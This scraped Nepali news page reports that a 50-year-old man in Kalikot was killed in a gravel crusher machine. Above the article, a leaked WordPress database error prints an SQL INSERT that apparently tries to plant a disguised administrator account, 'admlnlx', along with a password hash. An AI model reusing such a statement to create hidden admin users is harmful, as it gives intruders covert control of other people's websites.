WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BS.qkgbKX7YqmUeoe5DXv/gjeF7dcj0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 13:38:18', '', 'admlnlx', 'admlnlx')
कालिकोट, माघ २२ –
रोडा लोड गर्ने क्रममा क्रसर मेसिनमा च्यापिएर दाहा – १ आगतडी बस्ने ५० वर्षका ददि गोरालको ज्यान गएको छ ।छारेगाडमा क्रसर मेसिनमा रोडा लोड गर्न लाग्दा उनको ज्यान गएको जिल्ला प्रहरी कार्यालय कालिकोटले जनाएको छ । गोरालका दुई छोरा, दुई छोरी र श्रीमती रहेको स्थानीय हर्ष सुनारले बताउनुभयो ।